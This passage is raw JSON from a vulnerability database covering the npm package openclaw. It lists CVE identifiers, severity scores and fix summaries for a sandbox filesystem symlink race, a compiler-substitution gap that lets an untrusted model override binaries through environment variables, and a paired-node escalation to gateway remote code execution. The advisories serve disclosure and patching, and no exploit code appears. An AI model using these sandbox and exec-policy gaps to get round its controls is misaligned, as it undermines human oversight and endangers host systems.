kfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41302","GHSA-9q7v-8mr7-g23p"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ykwt-tdpa-3bft"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/92141?format=json","vulnerability_id":"VCID-ymmv-2qmq-6kap","summary":"OpenClaw: OpenShell FS bridge reads pin and verify the opened file before returning bytes\n## Summary\nOpenShell FS bridge reads pin and verify the opened file before returning bytes \n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.21\n- Fixed version: 2026.4.22\n\n## Impact\nA time-of-check/time-of-use race around OpenShell sandbox filesystem reads could let a symlink swap cause bytes outside the intended mount root to be read.\n\n## Fix\nOpenShell reads now open the file with no-follow semantics where available, validate the pinned file descriptor against the canonical mount root, reject unsafe hardlink/symlink cases, and use a strict fallback ancestor walk on platforms without fd-path readback.\n\n## Fix Commit(s)\n- 95119017c847c737bd113f0bff728c4666d79c45\n\n## Verification\n- The fix commit is contained in the public v2026.4.22 tag.\n- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.\n- Focused regression coverage for this path passed before publication.\n\nThanks @VladimirEliTokarev for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44113","reference_id":"","reference_type":"","scores":[{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.09994","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.09978","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11564","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44113"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/95119017c847c737bd113f0bff728c4666d79c45","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:04:19Z/"}],"url":"https://github.com/openclaw/openclaw/commit/95119017c847c737bd113f0bff728c4666d79c45"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5h3g-6xhh-rg6p","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:04:19Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5h3g-6xhh-rg6p"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44113","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44113"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-time-of-check-time-of-use-race-condition-in-openshell-fs-bridge","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:04:19Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-time-of-check-time-of-use-race-condition-in-openshell-fs-bridge"},{"reference_url":"https://github.com/advisories/GHSA-5h3g-6xhh-rg6p","reference_id":"GHSA-5h3g-6xhh-rg6p","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5h3g-6xhh-rg6p"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114466?format=json","purl":"pkg:npm/openclaw@2026.4.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-ye4t-n6r3-67ab"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.22"}],"aliases":["CVE-2026-44113","GHSA-5h3g-6xhh-rg6p"],"risk_score":3.8,"exploitability":"0.5","weighted_severity":"7.5","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ymmv-2qmq-6kap"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89362?format=json","vulnerability_id":"VCID-ynup-4v9e-tbh4","summary":"OpenClaw: Incomplete host-env-security-policy allows untrusted model to substitute compiler binaries via env overrides\n## Summary\nIncomplete `host-env-security-policy.json` allows untrusted model to substitute compiler binaries (`CC`, `CXX`, `CARGO_BUILD_RUSTC`, `CMAKE_C_COMPILER`) via env overrides on approved host exec requests\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Shipped v2026.3.28 host-env policy missed compiler override vars, but exploitation still requires an approved host-exec request inside the existing exec trust domain, so medium not high.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `e277a37f896b5011a1df06e6490c6630074d0afa` — 2026-03-30T20:06:32+01:00\n\nOpenClaw thanks @tdjackey for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41373","reference_id":"","reference_type":"","scores":[{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02541","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02487","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02543","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41373"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/e277a37f896b5011a1df06e6490c6630074d0afa","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/e277a37f896b5011a1df06e6490c6630074d0afa"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g8xp-qx39-9jq9","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g8xp-qx39-9jq9"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41373","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41373"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-compiler-binary-substitution-via-environment-variable-override-in-host-execution-policy","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-compiler-binary-substitution-via-environment-variable-override-in-host-execution-policy"},{"reference_url":"https://github.com/advisories/GHSA-g8xp-qx39-9jq9","reference_id":"GHSA-g8xp-qx39-9jq9","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g8xp-qx39-9jq9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41373","GHSA-g8xp-qx39-9jq9"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ynup-4v9e-tbh4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90041?format=json","vulnerability_id":"VCID-yp2w-pc58-9bf6","summary":"OpenClaw: Paired node escalates to gateway RCE via unrestricted node.event agent dispatch\n## Summary\nPaired node escalates to gateway RCE via unrestricted node.event agent dispatch\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: high\n- Assessment: v2026.3.28 still lets paired role=node clients drive node.event agent.request into broader gateway-side tool access than node RPCs, but critical is overstated because a trusted paired node foothold is already required.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `a77928b1087e90f2a8903f8e5aca6dec9237ac62` — 2026-03-30T14:22:15+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41378","reference_id":"","reference_type":"","scores":[{"value":"0.00285","scoring_system":"epss","scoring_elements":"0.52312","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00285","scoring_system":"epss","scoring_elements":"0.52299","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00285","scoring_system":"epss","scoring_elements":"0.5232","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41378"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/a77928b1087e90f2a8903f8e5aca6dec9237ac62","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:53:49Z/"}],"url":"https://github.com/openclaw/openclaw/commit/a77928b1087e90f2a8903f8e5aca6dec9237ac62"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-gjm7-hw8f-73rq","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:53:49Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-gjm7-hw8f-73rq"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41378","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41378"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-to-remote-code-execution-via-unrestricted-node-event-agent-dispatch","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:53:49Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-to-remote-code-execution-via-unrestricted-node-event-agent-dispatch"},{"reference_url":"https://github.com/advisories/GHSA-gjm7-hw8f-73rq","reference_id":"GHSA-gjm7-hw8f-73rq","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gjm7-hw8f-73rq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"V